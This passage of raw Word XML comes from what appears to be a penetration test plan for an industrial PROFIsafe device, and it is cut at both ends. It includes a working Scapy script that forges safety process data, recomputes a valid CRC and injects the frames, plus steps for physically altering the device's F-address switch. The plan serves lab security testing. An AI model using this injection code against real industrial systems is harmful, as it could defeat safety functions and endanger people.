              <w:t xml:space="preserve">1. Capture a legitimate cyclic frame; extract F-Parameters (F_Dest_Add, seed). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="649D564A" w14:textId="77777777" w:rsidR="007D150A" w:rsidRDefault="007D150A"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D150A">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Modify the payload. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5619177E" w14:textId="77777777" w:rsidR="007D150A" w:rsidRDefault="007D150A"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D150A">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Recompute the CRC over the modified payload. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F60B721" w14:textId="030446B4" w:rsidR="005D11F1" w:rsidRPr="005D11F1" w:rsidRDefault="007D150A"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D150A">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4. Inject; observe qualifier/outputs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D11F1" w:rsidRPr="00FD6890" w14:paraId="731539E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F305AA" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A2D3349" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRPr="005D11F1" w:rsidRDefault="005D11F1"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105B5093" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRPr="00AF57B2" w:rsidRDefault="005D11F1" w:rsidP="005D11F1">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A2EE268" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="005D11F1">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5D11F1" w14:paraId="36A459A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B082CE" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7596D633" w14:textId="77777777" w:rsidR="005D11F1"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5D11F1" w14:paraId="46212C8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10A167" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B0CD3AB" w14:textId="40C14EA3" w:rsidR="005D11F1" w:rsidRPr="005D11F1" w:rsidRDefault="0038268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82682">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ002-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D11F1" w:rsidRPr="00F15AEA" w14:paraId="453D4FA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1B4FB21" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E2E568E" w14:textId="77777777" w:rsidR="002862D2" w:rsidRDefault="002862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2862D2">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Pi eth0 = 192.168.0.100 side-inject; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DBAF721" w14:textId="77777777" w:rsidR="002862D2" w:rsidRDefault="002862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2862D2">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">DUT 192.168.0.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="118CD1FF" w14:textId="77777777" w:rsidR="002862D2" w:rsidRDefault="002862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2862D2">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">SPS 192.168.0.1; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1712BF30" w14:textId="38A79F08" w:rsidR="005D11F1" w:rsidRPr="005D11F1" w:rsidRDefault="002862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2862D2">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>laptop mirror</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D11F1" w:rsidRPr="00316EA1" w14:paraId="6091B4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C24D75C" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C66D8A4" w14:textId="541A892E" w:rsidR="005D11F1" w:rsidRPr="005D11F1" w:rsidRDefault="00511D6F" w:rsidP="00511D6F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1970"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00511D6F">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Scapy + PROFIsafe CRC routine (CRC-Seed24/32, 4-byte), Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D11F1" w:rsidRPr="00316EA1" w14:paraId="65CABA48"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0C5FFFE" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72F64D78"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#!/usr/bin/env python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E06D878"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 TC-RQ002-03 Valid-CRC-over-modified-data (proves accidental != intentional protection)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17AB78BE"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from scapy.all import Ether, Raw, sendp, rdpcap</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2843E253"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IFACE="eth0"; tmpl=rdpcap("ref.pcap")[0]; raw=bytearray(tmpl[Raw].load)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F4E40B3"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p w14:paraId="0814F5DD"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def profisafe_crc(data: bytes, seed: int) -&gt; int:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2728C2CE"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poly=0x1F4ACFB13; crc=seed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61C6100E"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for b in data:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0662E446"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crc ^= b&lt;&lt;24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ADBF639"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for _ in range(8):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0381A34E"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crc=((crc&lt;&lt;1)^poly) if (crc&amp;0x80000000) else (crc&lt;&lt;1); crc&amp;=0xFFFFFFFF</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F629C76"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return crc</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25192C64"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p w14:paraId="51C8C3C8"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PD=slice(0,-4); SEED=0x00000000 # derive from GSD CRC-Seed24/32 + F-Parameters</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E0BA620"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raw[2]^=0x01 # modify safety process data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FF0E4A1"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raw[-4:]=profisafe_crc(bytes(raw[PD]),SEED).to_bytes(4,"big") # recompute VALID CRC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="177FC783"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sendp(Ether(dst=tmpl[Ether].dst, src="02:aa:bb:cc:dd:ee", type=0x8892)/Raw(bytes(raw)),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C15A9F5"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iface=IFACE, count=300, inter=0.002)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56FA9248" w14:textId="0625ECC8" w:rsidR="005D11F1" w:rsidRPr="005D11F1"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print("[+] injected modified frame WITH valid recomputed CRC")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D11F1" w:rsidRPr="00AD4B09" w14:paraId="3CC34F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7ED66" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="559B2ABC" w14:textId="5A6F9CFD" w:rsidR="005D11F1" w:rsidRPr="005D11F1" w:rsidRDefault="00824F89" w:rsidP="00BE3CFC">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Pr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Accepted/ Rejected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D11F1" w:rsidRPr="00FD6890" w14:paraId="7268B02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BCCEBB7" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78956A32" w14:textId="77777777" w:rsidR="00594B05" w:rsidRDefault="00594B05"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594B05">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">TC03_validcrc.pcapng, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BAE0C1C" w14:textId="77777777" w:rsidR="00594B05" w:rsidRDefault="00594B05"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594B05">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Pi log, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12375E8E" w14:textId="77777777" w:rsidR="00594B05" w:rsidRDefault="00594B05"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594B05">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">PLC I/O trace, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F7B90A3" w14:textId="2F134B2A" w:rsidR="005D11F1" w:rsidRPr="005D11F1" w:rsidRDefault="00594B05"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594B05">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CRC-recompute source archived</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78110E59" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="472514BE" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56475CC9" w14:textId="6C3DEF9D" w:rsidR="005D11F1" w:rsidRDefault="00B37B1B" w:rsidP="005D11F1">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E404B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ002-05 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00E404B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Physical Tamper-Resistance of the F-Address Interface </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABF71F9" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="005D11F1">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5D11F1" w14:paraId="4534E76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D8426F6" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01D78C7A" w14:textId="77777777" w:rsidR="005D11F1"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5D11F1" w14:paraId="1764750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9D63E3" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="460DB84E" w14:textId="20879FB9" w:rsidR="005D11F1" w:rsidRPr="005D11F1" w:rsidRDefault="00E304F6"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E304F6">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ002-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D11F1" w:rsidRPr="001604A0" w14:paraId="7E0C419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3EB896F" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E0417A6" w14:textId="1456AD4D" w:rsidR="005D11F1" w:rsidRPr="005D11F1" w:rsidRDefault="000F4A54"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0F4A54">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>RQ-002 → EDR 3.11 (resistance limb) → Asset G</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D11F1" w:rsidRPr="00D67CA6" w14:paraId="0A36357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3C916D" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29A3C12A" w14:textId="475E4FEF" w:rsidR="005D11F1" w:rsidRPr="005D11F1" w:rsidRDefault="00364B9E"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64B9E">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D11F1" w14:paraId="661A1BD2"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CACC09C" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A65FFFA" w14:textId="35837A0D" w:rsidR="005D11F1" w:rsidRPr="005D11F1" w:rsidRDefault="00364B9E"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SVV-4 (Penetration Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D11F1" w:rsidRPr="00316EA1" w14:paraId="431DF29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AA26C0" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="249D56F6" w14:textId="1070A2D4" w:rsidR="005D11F1" w:rsidRPr="005D11F1" w:rsidRDefault="00EF3D8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EF3D81">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Assess the protection the device provides against physical corruption of </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF3D81">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>the F-address/mode switch: (a) confirm the temporal protection (a runtime switch change is ignored until reboot, so the running safety address cannot be corrupted live), and (b) determine whether the stored/next-boot address can be corrupted by physically altering the switch, with the seal being the only resisting barrier. This test evaluates tamper-resistance only; whether the intervention is recorded is assessed separately under RQ-003.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D11F1" w:rsidRPr="00316EA1" w14:paraId="309476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6EF02873" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="272855B9" w14:textId="77777777" w:rsidR="006971D1" w:rsidRDefault="006971D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971D1">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Record baseline address and seal state. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DF5CE72" w14:textId="77777777" w:rsidR="006971D1" w:rsidRDefault="006971D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971D1">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. With the device in OPERATE, remove the seal/sleeve and change the rotary switch; verify (per SRIO-10812) the running address is unchanged (temporal protection holds). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="693FCC71" w14:textId="77777777" w:rsidR="006971D1" w:rsidRDefault="006971D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971D1">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Cold-restart; confirm the new address now takes effect (next-boot corruption succeeded). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E4CBA51" w14:textId="09FDD0CC" w:rsidR="005D11F1" w:rsidRPr="005D11F1" w:rsidRDefault="006971D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971D1">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4. Assess the seal's resistance (did alteration require visible seal damage?).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D11F1" w:rsidRPr="00316EA1" w14:paraId="6446656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9A1FCB" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51AEDA84" w14:textId="77777777" w:rsidR="00A40E94" w:rsidRDefault="00A40E94"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A40E94">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Gap-characterisation test. Expected: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F0CC591" w14:textId="18041615" w:rsidR="00A40E94" w:rsidRDefault="00A40E94" w:rsidP="00A40E94">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>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A40E94">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">runtime change ignored (temporal protection = a genuine partial mitigation to credit); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52D17DD1" w14:textId="77777777" w:rsidR="00A40E94" w:rsidRDefault="00A40E94" w:rsidP="00A40E94">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>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A40E94">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> after reboot the altered address applies → the stored address is physically corruptible; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15C29121" w14:textId="06DFCD3E" w:rsidR="005D11F1" w:rsidRPr="005D11F1" w:rsidRDefault="00A40E94" w:rsidP="00A40E94">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>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A40E94">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(iii) the only resistance is the passive seal, with no active tamper-detection/response by the device → confirms G-3 (resistance-only physical protection), recorded as a partial EDR 3.11 result.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BADB02E" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRPr="00AF57B2" w:rsidRDefault="005D11F1" w:rsidP="005D11F1">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="514CCDA5" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="005D11F1">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5D11F1" w14:paraId="0484A44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A7A1361" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
